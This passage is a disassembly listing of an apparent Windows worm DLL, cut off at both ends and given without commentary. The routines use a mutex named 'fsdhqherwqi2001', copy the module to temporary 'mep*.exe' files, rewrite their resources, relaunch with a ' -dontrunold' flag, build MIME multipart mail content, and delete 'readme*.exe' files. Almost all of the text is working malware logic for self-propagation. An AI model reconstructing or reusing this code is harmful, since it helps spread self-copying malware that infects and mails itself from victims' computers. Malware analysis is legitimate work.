361761D7 361761D7 arg_0 = dword ptr 8 361761D7 arg_4 = dword ptr 0Ch 361761D7 arg_8 = dword ptr 10h 361761D7 arg_C = dword ptr 14h 361761D7 361761D7 push ebp 361761D8 mov ebp, esp 361761DA push 3Ch 361761DC push [ebp+arg_4] 361761DF call _strlen 361761E4 pop ecx 361761E5 push eax 361761E6 push [ebp+arg_4] 361761E9 push [ebp+arg_0] 361761EC call sub_361762B6 361761F1 add esp, 10h 361761F4 test eax, eax 361761F6 jnz short loc_361761FA 361761F8 pop ebp 361761F9 retn 361761FA ; ─────────────────────────────────────────────────────────────────────────── 361761FA 361761FA loc_361761FA: ; CODE XREF: sub_361761D7+1Fj 361761FA push 3Ch 361761FC push [ebp+arg_C] 361761FF push [ebp+arg_8] 36176202 push [ebp+arg_0] 36176205 call sub_36176215 3617620A add esp, 10h 3617620D neg eax 3617620F sbb eax, eax 36176211 neg eax 36176213 pop ebp 36176214 retn 36176214 sub_361761D7 endp 36176214 36176215 36176215 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36176215 36176215 ; Attributes: bp-based frame 36176215 36176215 sub_36176215 proc near ; CODE XREF: sub_36175AA9+10Bp 36176215 ; sub_361761D7+2Ep 36176215 36176215 var_10C = dword ptr -10Ch 36176215 var_108 = dword ptr -108h 36176215 var_8 = dword ptr -8 36176215 arg_0 = dword ptr 8 36176215 arg_4 = dword ptr 0Ch 36176215 arg_8 = dword ptr 10h 36176215 arg_C = dword ptr 14h 36176215 36176215 push ebp 36176216 mov ebp, esp 36176218 sub esp, 10Ch 3617621E push ebx 3617621F push esi 36176220 push edi 36176221 mov edi, [ebp+arg_4] 36176224 xor ebx, ebx 36176226 xor esi, esi 36176228 mov [edi], bl 3617622A 3617622A loc_3617622A: ; CODE XREF: sub_36176215+93j 3617622A push 8 3617622C lea eax, [ebp+var_8] 3617622F push ebx 36176230 push eax 36176231 call _memset 36176236 mov eax, [ebp+arg_C] 36176239 add esp, 0Ch 3617623C mov [ebp+var_8], eax 3617623F mov eax, [ebp+arg_0] 36176242 mov [ebp+var_108], eax 36176248 lea eax, [ebp+var_8] 3617624B push eax 3617624C push ebx 3617624D lea eax, [ebp+var_10C] 36176253 
push ebx 36176254 push eax 36176255 push ebx 36176256 mov [ebp+var_10C], 1 36176260 call dword_3617AC40 36176266 cmp eax, ebx 36176268 jz short loc_361762AF 3617626A cmp eax, 0FFFFFFFFh 3617626D jz short loc_361762AF 3617626F lea eax, [ebp+var_10C] 36176275 push eax 36176276 push [ebp+arg_0] 36176279 call dword_3617AC60 3617627F test eax, eax 36176281 jz short loc_361762AF 36176283 mov eax, [ebp+arg_8] 36176286 push ebx 36176287 sub eax, esi 36176289 dec eax 3617628A push eax 3617628B lea eax, [esi+edi] 3617628E push eax 3617628F push [ebp+arg_0] 36176292 call dword_3617AC50 36176298 cmp eax, 0FFFFFFFFh 3617629B jz short loc_361762AF 3617629D cmp eax, ebx 3617629F jz short loc_361762AF 361762A1 add esi, eax 361762A3 cmp byte ptr [esi+edi-1], 0Ah 361762A8 jnz short loc_3617622A 361762AA push 1 361762AC pop eax 361762AD jmp short loc_361762B1 361762AF ; ─────────────────────────────────────────────────────────────────────────── 361762AF 361762AF loc_361762AF: ; CODE XREF: sub_36176215+53j 361762AF ; sub_36176215+58j ... 361762AF xor eax, eax 361762B1 361762B1 loc_361762B1: ; CODE XREF: sub_36176215+98j 361762B1 pop edi 361762B2 pop esi 361762B3 pop ebx 361762B4 leave 361762B5 retn 361762B5 sub_36176215 endp 361762B5 361762B6 361762B6 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361762B6 361762B6 ; Attributes: bp-based frame 361762B6 361762B6 sub_361762B6 proc near ; CODE XREF: sub_36175AA9+327p 361762B6 ; sub_36175AA9+3DBp ... 
361762B6 361762B6 var_10C = dword ptr -10Ch 361762B6 var_108 = dword ptr -108h 361762B6 var_8 = dword ptr -8 361762B6 arg_0 = dword ptr 8 361762B6 arg_4 = dword ptr 0Ch 361762B6 arg_8 = dword ptr 10h 361762B6 361762B6 push ebp 361762B7 mov ebp, esp 361762B9 sub esp, 10Ch 361762BF push ebx 361762C0 push esi 361762C1 push edi 361762C2 mov edi, [ebp+arg_0] 361762C5 xor ebx, ebx 361762C7 xor esi, esi 361762C9 361762C9 loc_361762C9: ; CODE XREF: sub_361762B6+8Aj 361762C9 push 8 361762CB lea eax, [ebp+var_8] 361762CE push ebx 361762CF push eax 361762D0 call _memset 361762D5 add esp, 0Ch 361762D8 lea eax, [ebp+var_8] 361762DB mov [ebp+var_8], 3Ch 361762E2 mov [ebp+var_108], edi 361762E8 push eax 361762E9 lea eax, [ebp+var_10C] 361762EF push ebx 361762F0 push eax 361762F1 push ebx 361762F2 push ebx 361762F3 mov [ebp+var_10C], 1 361762FD call dword_3617AC40 36176303 cmp eax, ebx 36176305 jz short loc_36176347 36176307 cmp eax, 0FFFFFFFFh 3617630A jz short loc_36176347 3617630C lea eax, [ebp+var_10C] 36176312 push eax 36176313 push edi 36176314 call dword_3617AC60 3617631A test eax, eax 3617631C jz short loc_36176347 3617631E mov eax, [ebp+arg_8] 36176321 push ebx 36176322 sub eax, esi 36176324 push eax 36176325 mov eax, [ebp+arg_4] 36176328 add eax, esi 3617632A push eax 3617632B push edi 3617632C call dword_3617AC48 36176332 cmp eax, 0FFFFFFFFh 36176335 jz short loc_36176347 36176337 cmp eax, ebx 36176339 jz short loc_36176342 3617633B add esi, eax 3617633D cmp esi, [ebp+arg_8] 36176340 jl short loc_361762C9 36176342 36176342 loc_36176342: ; CODE XREF: sub_361762B6+83j 36176342 push 1 36176344 pop eax 36176345 jmp short loc_36176349 36176347 ; ─────────────────────────────────────────────────────────────────────────── 36176347 36176347 loc_36176347: ; CODE XREF: sub_361762B6+4Fj 36176347 ; sub_361762B6+54j ... 
36176347 xor eax, eax 36176349 36176349 loc_36176349: ; CODE XREF: sub_361762B6+8Fj 36176349 pop edi 3617634A pop esi 3617634B pop ebx 3617634C leave 3617634D retn 3617634D sub_361762B6 endp 3617634D 3617634E 3617634E ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617634E 3617634E 3617634E _DllMain@12 proc near ; CODE XREF: start+4Bp 3617634E 3617634E arg_0 = dword ptr 14h 3617634E 3617634E push ecx 3617634F push ebx 36176350 push ebp 36176351 push esi 36176352 xor esi, esi 36176354 push edi 36176355 push esi 36176356 push 80000h 3617635B push esi 3617635C mov dword_3617ACB4, esi 36176362 call ds:HeapCreate 36176368 cmp eax, esi 3617636A mov dword_3617ACB4, eax 3617636F jz loc_36176506 36176375 push [esp+4+arg_0] 36176379 call sub_36176AE6 3617637E cmp eax, 1 36176381 pop ecx 36176382 mov dword_3617D708, eax 36176387 jz short loc_361763D7 36176389 push [esp+4+arg_0] 3617638D call sub_36176A22 36176392 mov esi, ds:CreateMutexA 36176398 mov edi, ds:GetLastError 3617639E test eax, eax 361763A0 pop ecx 361763A1 mov ebp, offset aFsdhqherwqi200 ; "fsdhqherwqi2001" 361763A6 mov ebx, 0B7h 361763AB jnz short loc_36176408 361763AD xor eax, eax 361763AF cmp dword_3617D708, eax 361763B5 jnz short loc_36176408 361763B7 push ebp 361763B8 push eax 361763B9 push eax 361763BA call esi ; CreateMutexA 361763BC mov [esp+10h], eax 361763C0 call edi ; GetLastError 361763C2 cmp eax, ebx 361763C4 jnz short loc_361763E8 361763C6 cmp dword ptr [esp+10h], 0 361763CB jz short loc_361763D7 361763CD push dword ptr [esp+10h] 361763D1 call ds:CloseHandle 361763D7 361763D7 loc_361763D7: ; CODE XREF: _DllMain@12+39j 361763D7 ; _DllMain@12+7Dj 361763D7 push dword_3617ACB4 361763DD call ds:HeapDestroy 361763E3 jmp loc_36176506 361763E8 ; ─────────────────────────────────────────────────────────────────────────── 361763E8 361763E8 loc_361763E8: ; CODE XREF: _DllMain@12+76j 361763E8 push dword ptr [esp+10h] 361763EC call ds:CloseHandle 361763F2 push [esp+4+arg_0] 
361763F6 call sub_36176511 361763FB pop ecx 361763FC push dword_3617ACB4 36176402 call ds:HeapDestroy 36176408 36176408 loc_36176408: ; CODE XREF: _DllMain@12+5Dj 36176408 ; _DllMain@12+67j 36176408 call sub_361748F9 3617640D cmp dword_3617D708, 0 36176414 jnz short loc_3617641B 36176416 call sub_36174125 3617641B 3617641B loc_3617641B: ; CODE XREF: _DllMain@12+C6j 3617641B push ebp 3617641C push 0 3617641E push 0 36176420 call esi ; CreateMutexA 36176422 mov esi, eax 36176424 call edi ; GetLastError 36176426 cmp eax, ebx 36176428 jnz short loc_36176453 3617642A test esi, esi 3617642C jz short loc_36176435 3617642E push esi 3617642F call ds:CloseHandle 36176435 36176435 loc_36176435: ; CODE XREF: _DllMain@12+DEj 36176435 call dword_3617AC64 3617643B call sub_36174DC8 36176440 push dword_3617ACB4 36176446 call ds:HeapDestroy 3617644C push 0 3617644E jmp loc_36176500 36176453 ; ─────────────────────────────────────────────────────────────────────────── 36176453 36176453 loc_36176453: ; CODE XREF: _DllMain@12+DAj 36176453 push esi 36176454 call ds:CloseHandle 3617645A xor esi, esi 3617645C cmp dword_3617D708, esi 36176462 jnz short loc_361764C6 36176464 push offset aDontrunold ; "dontrunold" 36176469 push offset byte_3617CCB8 3617646E call ds:strstr 36176474 pop ecx 36176475 test eax, eax 36176477 pop ecx 36176478 jnz short loc_361764C6 3617647A push [esp+4+arg_0] 3617647E call sub_36176511 36176483 pop ecx 36176484 call ds:GetTickCount 3617648A push eax 3617648B call ds:srand 36176491 pop ecx 36176492 call ds:rand 36176498 imul eax, 64h 3617649B cdq 3617649C mov ecx, 7FFFh 361764A1 idiv ecx 361764A3 cmp eax, 50h 361764A6 jle short loc_361764AD 361764A8 call sub_36176932 361764AD 361764AD loc_361764AD: ; CODE XREF: _DllMain@12+158j 361764AD call dword_3617AC64 361764B3 call sub_36174DC8 361764B8 push dword_3617ACB4 361764BE call ds:HeapDestroy 361764C4 jmp short loc_361764FF 361764C6 ; ─────────────────────────────────────────────────────────────────────────── 
361764C6
361764C6 loc_361764C6:                      ; CODE XREF: _DllMain@12+114j
361764C6                                    ; _DllMain@12+12Aj
361764C6    call    sub_361766AC
361764CB    call    sub_361767C9
361764D0    cmp     dword_3617D708, esi
361764D6    jnz     short loc_361764DD
361764D8    call    sub_36171D7C
361764DD
361764DD loc_361764DD:                      ; CODE XREF: _DllMain@12+188j
361764DD    cmp     dword_3617ACB0, esi
361764E3    jz      short loc_361764EE
361764E5    cmp     dword_3617D708, 63h
361764EC    jnz     short loc_361764F4
361764EE
361764EE loc_361764EE:                      ; CODE XREF: _DllMain@12+195j
361764EE    push    esi
361764EF    call    sub_36171F05
361764F4
361764F4 loc_361764F4:                      ; CODE XREF: _DllMain@12+19Ej
361764F4    call    dword_3617AC64
361764FA    call    sub_36174DC8
361764FF
361764FF loc_361764FF:                      ; CODE XREF: _DllMain@12+176j
361764FF    push    esi
36176500
36176500 loc_36176500:                      ; CODE XREF: _DllMain@12+100j
36176500    call    ds:ExitProcess
36176506
36176506 loc_36176506:                      ; CODE XREF: _DllMain@12+21j
36176506                                    ; _DllMain@12+95j
36176506    push    1
36176508    pop     eax
36176509    pop     edi
3617650A    pop     esi
3617650B    pop     ebp
3617650C    pop     ebx
3617650D    pop     ecx
3617650E    retn    0Ch
3617650E _DllMain@12 endp
3617650E
36176511
36176511 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36176511
36176511 ; Attributes: bp-based frame
36176511
36176511 sub_36176511 proc near             ; CODE XREF: _DllMain@12+A8p
36176511                                    ; _DllMain@12+130p
36176511
36176511 var_864 = dword ptr -864h
36176511 var_854 = byte ptr -854h
36176511 var_454 = byte ptr -454h
36176511 var_254 = byte ptr -254h
36176511 var_54  = dword ptr -54h
36176511 var_24  = word ptr -24h
36176511 var_10  = byte ptr -10h
36176511 arg_0   = dword ptr 8
36176511
36176511    push    ebp
36176512    mov     ebp, esp
36176514    sub     esp, 854h
3617651A    push    ebx
3617651B    push    esi
3617651C    push    edi
3617651D    push    [ebp+arg_0]
36176520    call    sub_36176A22
36176525    test    eax, eax
36176527    pop     ecx
36176528    mov     edi, offset byte_3617B4B8
3617652D    jnz     loc_361765BD
36176533    call    sub_36174A06
36176538    mov     esi, 400h
3617653D    mov     ebx, offset byte_3617B0B8
36176542    push    esi
36176543    push    ebx
36176544    call    ds:GetWindowsDirectoryA
3617654A    push    ebx
3617654B    call    sub_3617186E
36176550    pop     ecx
36176551    mov     ebx, offset byte_3617ACB8
36176556    push    esi
36176557    push    ebx
36176558    call    ds:GetSystemDirectoryA
3617655E    push    ebx
3617655F    call    sub_3617186E
36176564    pop     ecx
36176565    push    edi
36176566    push    esi
36176567    call    ds:GetTempPathA
3617656D    push    edi
3617656E    call    sub_3617186E
36176573    pop     ecx
36176574    call    ds:GetCommandLineA
3617657A    push    eax
3617657B    push    offset byte_3617CCB8
36176580    call    _strcpy
36176585    pop     ecx
36176586    mov     ebx, offset byte_3617D0B8
3617658B    pop     ecx
3617658C    push    ebx
3617658D    push    esi
3617658E    call    ds:GetCurrentDirectoryA
36176594    push    ebx
36176595    call    sub_3617186E
3617659A    mov     dword ptr [esp], offset SHELL32DLL ; "SHELL32.DLL"
361765A1    call    ds:LoadLibraryA
361765A7    push    offset aShellexecutea   ; "ShellExecuteA"
361765AC    push    eax
361765AD    mov     dword_3617AC9C, eax
361765B2    call    ds:GetProcAddress
361765B8    mov     dword_3617AC94, eax
361765BD
361765BD loc_361765BD:                      ; CODE XREF: sub_36176511+1Cj
361765BD    mov     ebx, ds:GetModuleFileNameA
361765C3    lea     eax, [ebp+var_454]
361765C9    push    200h
361765CE    push    eax
361765CF    push    [ebp+arg_0]
361765D2    call    ebx                     ; GetModuleFileNameA
361765D4    xor     esi, esi
361765D6    test    eax, eax
361765D8    jnz     short loc_361765E9
361765DA    lea     eax, [ebp+var_454]
361765E0    push    200h
361765E5    push    eax
361765E6    push    esi
361765E7    call    ebx                     ; GetModuleFileNameA
361765E9
361765E9 loc_361765E9:                      ; CODE XREF: sub_36176511+C7j
361765E9    lea     eax, [ebp+var_254]
361765EF    push    eax
361765F0    push    esi
361765F1    push    offset mep              ; "mep"
361765F6    push    edi
361765F7    call    ds:GetTempFileNameA
361765FD    lea     eax, [ebp+var_254]
36176603    push    offset dot_exe          ; ".exe"
36176608    push    eax
36176609    call    _strcat
3617660E    pop     ecx
3617660F    lea     eax, [ebp+var_254]
36176615    pop     ecx
36176616    push    esi
36176617    push    eax
36176618    lea     eax, [ebp+var_454]
3617661E    push    eax
3617661F    call    ds:CopyFileA
36176625    lea     eax, [ebp+var_254]
3617662B    push    1
3617662D    push    eax
3617662E    call    sub_361719A3
36176633    push    44h
36176635    lea     eax, [ebp+var_54]
36176638    pop     edi
36176639    push    edi
3617663A    push    esi
3617663B    push    eax
3617663C    call    _memset
36176641    push    10h
36176643    lea     eax, [ebp+var_10]
36176646    push    esi
36176647    push    eax
36176648    call    _memset
3617664D    lea     eax, [ebp+var_254]
36176653    mov     [ebp+var_54], edi
36176656    push    eax
36176657    lea     eax, [ebp+var_854]
3617665D    push    eax
3617665E    mov     [ebp+var_24], si
36176662    call    _strcpy
36176667    lea     eax, [ebp+var_854]
3617666D    push    offset aDontrunold_0    ; " -dontrunold"
36176672    push    eax
36176673    call    _strcat
36176678    add     esp, 30h
3617667B    lea     eax, [ebp+var_10]
3617667E    push    eax
3617667F    lea     eax, [ebp+var_54]
36176682    push    eax
36176683    push    esi
36176684    push    esi
36176685    push    esi
36176686    push    esi
36176687    push    esi
36176688    lea     eax, [ebp+var_854]
3617668E    push    esi
3617668F    push    eax
36176690    push    esi
36176691    call    ds:CreateProcessA
36176697    lea     eax, [ebp+var_254]
3617669D    push    eax
3617669E    call    sub_36171899
361766A3    pop     ecx
361766A4    push    1
361766A6    pop     eax
361766A7    pop     edi
361766A8    pop     esi
361766A9    pop     ebx
361766AA    leave
361766AB    retn
361766AB sub_36176511 endp
361766AB
361766AC
361766AC ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
361766AC
361766AC ; Attributes: bp-based frame
361766AC
361766AC sub_361766AC proc near             ; CODE XREF: _DllMain@12+178p
361766AC
361766AC var_C = byte ptr -0Ch
361766AC var_4 = dword ptr -4
361766AC
361766AC    push    ebp
361766AD    mov     ebp, esp
361766AF    sub     esp, 0Ch
361766B2    push    ebx
361766B3    push    esi
361766B4    push    edi
361766B5    call    sub_3617164B
361766BA    mov     ebx, offset byte_3617C4B8
361766BF    xor     esi, esi
361766C1    push    ebx
361766C2    push    esi
361766C3    push    offset mep              ; "mep"
361766C8    push    offset byte_3617B4B8
361766CD    call    ds:GetTempFileNameA
361766D3    push    ebx
361766D4    call    ds:DeleteFileA
361766DA    push    offset dot_exe          ; ".exe"
361766DF    push    ebx
361766E0    call    _strcat
361766E5    pop     ecx
361766E6    pop     ecx
361766E7    push    esi
361766E8    push    ebx
361766E9    push    offset byte_3617C0B8
361766EE    call    ds:CopyFileA
361766F4    push    80h
361766F9    push    ebx
361766FA    call    ds:SetFileAttributesA
36176700    push    esi
36176701    push    ebx
36176702    call    ds:BeginUpdateResourceA
36176708    mov     esi, offset aNull       ; "NULL"
3617670D    lea     edi, [ebp-0Ch]
36176710    movsd
36176711    movsb
36176712    push    1
36176714    lea     ecx, [ebp-0Ch]
36176717    pop     edi
36176718    mov     [ebp-4], eax
3617671B    push    edi
3617671C    push    ecx
3617671D    push    804h
36176722    push    66h
36176724    push    0Ah
36176726    push    eax
36176727    call    ds:UpdateResourceA
3617672D    xor     esi, esi
3617672F    push    esi
36176730    push    dword ptr [ebp-4]
36176733    call    ds:EndUpdateResourceA
36176739    push    esi
3617673A    push    ebx
3617673B    call    sub_361719A3
36176740    push    ebx
36176741    call    sub_36171899
36176746    add     esp, 0Ch
36176749    push    esi
3617674A    push    esi
3617674B    push    3
3617674D    push    esi
3617674E    push    3
36176750    push    0C0000000h
36176755    push    ebx
36176756    call    ds:CreateFileA
3617675C    mov     ebx, eax
3617675E    cmp     ebx, 0FFFFFFFFh
36176761    jz      short loc_361767C2
36176763    push    esi
36176764    push    esi
36176765    push    0D0h
3617676A    push    ebx
3617676B    call    ds:SetFilePointer
36176771    cmp     eax, 0FFFFFFFFh
36176774    jz      short loc_361767BB
36176776    cmp     dword_3617A410, esi
3617677C    jnz     short loc_36176796
3617677E    lea     eax, [ebp-4]
36176781    push    esi
36176782    push    eax
36176783    push    4
36176785    push    offset dword_3617A410
3617678A    push    ebx
3617678B    mov     [ebp-4], esi
3617678E    call    ds:ReadFile
36176794    jmp     short loc_361767AC
36176796 ; ───────────────────────────────────────────────────────────────────────────
36176796
36176796 loc_36176796:                      ; CODE XREF: sub_361766AC+D0j
36176796    lea     eax, [ebp-4]
36176799    push    esi
3617679A    push    eax
3617679B    push    4
3617679D    push    offset dword_3617A410
361767A2    push    ebx
361767A3    mov     [ebp-4], esi
361767A6    call    ds:WriteFile
361767AC
361767AC loc_361767AC:                      ; CODE XREF: sub_361766AC+E8j
361767AC    test    eax, eax
361767AE    jnz     short loc_361767BB
361767B0    push    ebx
361767B1    call    ds:CloseHandle
361767B7    xor     eax, eax
361767B9    jmp     short loc_361767C4
361767BB ; ───────────────────────────────────────────────────────────────────────────
361767BB
361767BB loc_361767BB:                      ; CODE XREF: sub_361766AC+C8j
361767BB                                    ; sub_361766AC+102j
361767BB    push    ebx
361767BC    call    ds:CloseHandle
361767C2
361767C2 loc_361767C2:                      ; CODE XREF: sub_361766AC+B5j
361767C2    mov     eax, edi
361767C4
361767C4 loc_361767C4:                      ; CODE XREF: sub_361766AC+10Dj
361767C4    pop     edi
361767C5    pop     esi
361767C6    pop     ebx
361767C7    leave
361767C8    retn
361767C8 sub_361766AC endp
361767C8
361767C9
361767C9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
361767C9
361767C9
361767C9 sub_361767C9 proc near             ; CODE XREF: _DllMain@12+17Dp
361767C9
361767C9 var_410 = dword ptr -410h
361767C9 var_40C = dword ptr -40Ch
361767C9 var_408 = byte ptr -408h
361767C9 var_400 = byte ptr -400h
361767C9
361767C9    sub     esp, 410h
361767CF    push    ebx
361767D0    push    ebp
361767D1    push    esi
361767D2    lea     eax, [esp+1Ch]
361767D6    push    edi
361767D7    xor     ebx, ebx
361767D9    push    eax
361767DA    push    ebx
361767DB    push    offset mep              ; "mep"
361767E0    push    offset byte_3617B4B8
361767E5    call    ds:GetTempFileNameA
361767EB    lea     eax, [esp+20h]
361767EF    push    ebx
361767F0    push    eax
361767F1    push    offset byte_3617C0B8
361767F6    call    ds:CopyFileA
361767FC    mov     ebp, 80h
36176801    lea     eax, [esp+20h]
36176805    push    ebp
36176806    push    eax
36176807    call    ds:SetFileAttributesA
3617680D    lea     eax, [esp+20h]
36176811    push    ebx
36176812    push    eax
36176813    call    ds:BeginUpdateResourceA
36176819    mov     esi, offset aNull       ; "NULL"
3617681E    lea     edi, [esp+18h]
36176822    lea     ecx, [esp+18h]
36176826    push    1
36176828    movsd
36176829    push    ecx
3617682A    push    804h
3617682F    push    66h
36176831    push    0Ah
36176833    push    eax
36176834    mov     [esp+28h], eax
36176838    movsb
36176839    call    ds:UpdateResourceA
3617683F    push    ebx
36176840    push    dword ptr [esp+14h]
36176844    call    ds:EndUpdateResourceA
3617684A    mov     esi, offset byte_3617C8B8
3617684F    push    esi
36176850    push    ebx
36176851    push    offset mep              ; "mep"
36176856    push    offset byte_3617B4B8
3617685B    call    ds:GetTempFileNameA
36176861    mov     edi, ds:CreateFileA
36176867    push    ebx
36176868    push    ebp
36176869    push    2
3617686B    push    ebx
3617686C    push    ebx
3617686D    push    40000000h
36176872    push    esi
36176873    call    edi                     ; CreateFileA
36176875    cmp     eax, 0FFFFFFFFh
36176878    mov     [esp+10h], eax
3617687C    jnz     short write_MIME
3617687E    push    esi
3617687F    mov     esi, ds:DeleteFileA
36176885    call    esi                     ; DeleteFileA
36176887    lea     eax, [esp+20h]
3617688B    push    eax
3617688C    call    esi                     ; DeleteFileA
3617688E    jmp     short loc_361768EF
36176890 ; ───────────────────────────────────────────────────────────────────────────
36176890
36176890 write_MIME:                        ; CODE XREF: sub_361767C9+B3j
36176890    lea     eax, [esp+14h]
36176894    push    ebx
36176895    push    eax
36176896    push    offset MIME_header      ; "MIME-Version: 1.0\r\nContent-Type: multip"...
3617689B    call    _strlen
361768A0    pop     ecx
361768A1    push    eax
361768A2    push    offset MIME_header      ; "MIME-Version: 1.0\r\nContent-Type: multip"...
361768A7    push    dword ptr [esp+20h]
361768AB    call    ds:WriteFile
361768B1    push    dword ptr [esp+10h]
361768B5    call    ds:CloseHandle
361768BB    lea     eax, [esp+20h]
361768BF    push    esi
361768C0    push    eax
361768C1    call    sub_36175256
361768C6    pop     ecx
361768C7    lea     eax, [esp+24h]
361768CB    pop     ecx
361768CC    push    eax
361768CD    call    ds:DeleteFileA
361768D3    push    ebx
361768D4    push    ebp
361768D5    push    4
361768D7    push    ebx
361768D8    push    ebx
361768D9    push    40000000h
361768DE    push    esi
361768DF    call    edi                     ; CreateFileA
361768E1    mov     edi, eax
361768E3    cmp     edi, 0FFFFFFFFh
361768E6    jnz     short loc_361768F3
361768E8    push    esi
361768E9    call    ds:DeleteFileA
361768EF
361768EF loc_361768EF:                      ; CODE XREF: sub_361767C9+C5j
361768EF    xor     eax, eax
361768F1    jmp     short loc_36176927
361768F3 ; ───────────────────────────────────────────────────────────────────────────
361768F3
361768F3 loc_361768F3:                      ; CODE XREF: sub_361767C9+11Dj
361768F3    push    2
361768F5    push    ebx
361768F6    push    ebx
361768F7    push    edi
361768F8    call    ds:SetFilePointer
361768FE    lea     eax, [esp+14h]
36176902    push    ebx
36176903    mov     esi, offset a_abc1234567890 ; "\r\n\r\n--====_ABC1234567890DEF_====\r\n\r\n"
36176908    push    eax
36176909    push    esi
3617690A    mov     [esp+20h], ebx
3617690E    call    _strlen
36176913    pop     ecx
36176914    push    eax
36176915    push    esi
36176916    push    edi
36176917    call    ds:WriteFile
3617691D    push    edi
3617691E    call    ds:CloseHandle
36176924    push    1
36176926    pop     eax
36176927
36176927 loc_36176927:                      ; CODE XREF: sub_361767C9+128j
36176927    pop     edi
36176928    pop     esi
36176929    pop     ebp
3617692A    pop     ebx
3617692B    add     esp, 410h
36176931    retn
36176931 sub_361767C9 endp
36176931
36176932
36176932 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36176932
36176932
36176932 sub_36176932 proc near             ; CODE XREF: _DllMain@12+15Ap
36176932
36176932 var_15C = dword ptr -15Ch
36176932 var_150 = dword ptr -150h
36176932 var_14C = byte ptr -14Ch
36176932 var_120 = byte ptr -120h
36176932
36176932    sub     esp, 144h
36176938    push    ebx
36176939    push    ebp
3617693A    push    esi
3617693B    push    edi
3617693C    mov     edi, 400h
36176941    push    edi
36176942    push    8
36176944    push    dword_3617ACB4
3617694A    call    dword_3617AC74
36176950    mov     esi, eax
36176952    test    esi, esi
36176954    jz      loc_36176A17
3617695A    mov     ebp, offset byte_3617B4B8
3617695F    push    edi
36176960    push    ebp
36176961    push    esi
36176962    call    ds:strncpy
36176968    push    esi
36176969    call    sub_3617186E
3617696E    push    ebp
3617696F    call    _strlen
36176974    mov     ebx, ds:strncat
3617697A    mov     ecx, edi
3617697C    sub     ecx, eax
3617697E    push    ecx
3617697F    push    offset aReadme_exe      ; "\\readme*.exe"
36176984    push    esi
36176985    call    ebx                     ; strncat
36176987    add     esp, 20h
3617698A    lea     eax, [esp+160h+var_14C]
3617698E    push    eax
3617698F    push    esi
36176990    call    ds:FindFirstFileA
36176996    cmp     eax, 0FFFFFFFFh
36176999    mov     [esp+160h+var_150], eax
3617699D    jnz     short loc_361769B0
3617699F    push    esi
361769A0    push    0
361769A2    push    dword_3617ACB4
361769A8    call    dword_3617AC70
361769AE    jmp     short loc_36176A14
361769B0 ; ───────────────────────────────────────────────────────────────────────────
361769B0
361769B0 loc_361769B0:                      ; CODE XREF: sub_36176932+6Bj
361769B0                                    ; sub_36176932+C8j
361769B0    push    edi
361769B1    push    ebp
361769B2    push    esi
361769B3    call    ds:strncpy
361769B9    push    esi
361769BA    call    _strlen
361769BF    mov     ecx, edi
361769C1    sub     ecx, eax
361769C3    push    ecx
361769C4    push    offset asc_36179474     ; "\\"
361769C9    push    esi
361769CA    call    ebx                     ; strncat
361769CC    push    esi
361769CD    call    _strlen
361769D2    mov     ecx, edi
361769D4    sub     ecx, eax
361769D6    lea     eax, [esp+180h+var_120]
361769DA    push    ecx
361769DB    push    eax
361769DC    push    esi
361769DD    call    ebx                     ; strncat
361769DF    add     esp, 2Ch
361769E2    push    esi
361769E3    call    ds:DeleteFileA
361769E9    lea     eax, [esp+160h+var_14C]
361769ED    push    eax
361769EE    push    [esp+164h+var_150]
361769F2    call    ds:FindNextFileA
361769F8    test    eax, eax
361769FA    jnz     short loc_361769B0
361769FC    push    esi
361769FD    push    eax
361769FE    push    dword_3617ACB4
36176A04    call    dword_3617AC70
36176A0A    push    [esp+16Ch+var_15C]
36176A0E    call    ds:FindClose
36176A14
36176A14 loc_36176A14:                      ; CODE XREF: sub_36176932+7Cj
36176A14    push    1
36176A16    pop     eax
36176A17
36176A17 loc_36176A17:                      ; CODE XREF: sub_36176932+22j
36176A17    pop     edi
36176A18    pop     esi
36176A19    pop     ebp
36176A1A    pop     ebx
36176A1B    add     esp, 144h
36176A21    retn
36176A21 sub_36176932 endp                  ; sp = -18h
36176A21
36176A22
36176A22 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36176A22
36176A22 ; Attributes: bp-based frame
36176A22
36176A22 sub_36176A22 proc near             ; CODE XREF: _DllMain@12+3Fp
36176A22                                    ; sub_36176511+Fp ...
36176A22
36176A22 var_420 = byte ptr -420h
36176A22 var_20  = byte ptr -20h
36176A22 arg_0   = dword ptr 8
36176A22
36176A22    push    ebp
36176A23    mov     ebp, esp
36176A25    sub     esp, 420h
36176A2B    push    ebx
36176A2C    push    esi
36176A2D    mov     esi, ds:GetModuleFileNameA
36176A33    push    edi
36176A34    and     [ebp+var_420], 0
36176A3B    mov     edi, 400h
36176A40    lea     eax, [ebp+var_420]
36176A46    push    edi
36176A47    push    eax
36176A48    push    [ebp+arg_0]
36176A4B    call    esi                     ; GetModuleFileNameA
36176A4D    test    eax, eax
36176A4F    jnz     short loc_36176A5D
36176A51    lea     eax, [ebp+var_420]
36176A57    push    edi
36176A58    push    eax
36176A59    push    0
36176A5B    call    esi                     ; GetModuleFileNameA
36176A5D
36176A5D loc_36176A5D:                      ; CODE XREF: sub_36176A22+2Dj
36176A5D    lea     eax, [ebp+var_420]
36176A63    push    eax
36176A64    call    _strlen
36176A69    mov     ebx, eax
36176A6B    pop     ecx
36176A6C    cmp     ebx, 5
36176A6F    jl      short loc_36176ADE
36176A71    lea     esi, [ebp+ebx+var_420]
36176A78    lea     eax, [esi-4]
36176A7B    push    eax
36176A7C    lea     eax, [ebp+var_20]
36176A7F    push    eax
36176A80    call    _strcpy
36176A85    mov     edi, ds:_strlwr
36176A8B    lea     eax, [ebp+var_20]
36176A8E    push    eax
36176A8F    call    edi                     ; _strlwr
36176A91    lea     eax, [ebp+var_20]
36176A94    push    offset dot_exe          ; ".exe"
36176A99    push    eax
36176A9A    call    _strcmp
36176A9F    add     esp, 14h
36176AA2    test    eax, eax
36176AA4    jz      short loc_36176ADE
36176AA6    cmp     ebx, 0Ah
36176AA9    jge     short loc_36176AAF
36176AAB    xor     eax, eax
36176AAD    jmp     short loc_36176AE1
36176AAF ; ───────────────────────────────────────────────────────────────────────────
36176AAF
36176AAF loc_36176AAF:                      ; CODE XREF: sub_36176A22+87j
36176AAF    add     esi, 0FFFFFFF7h
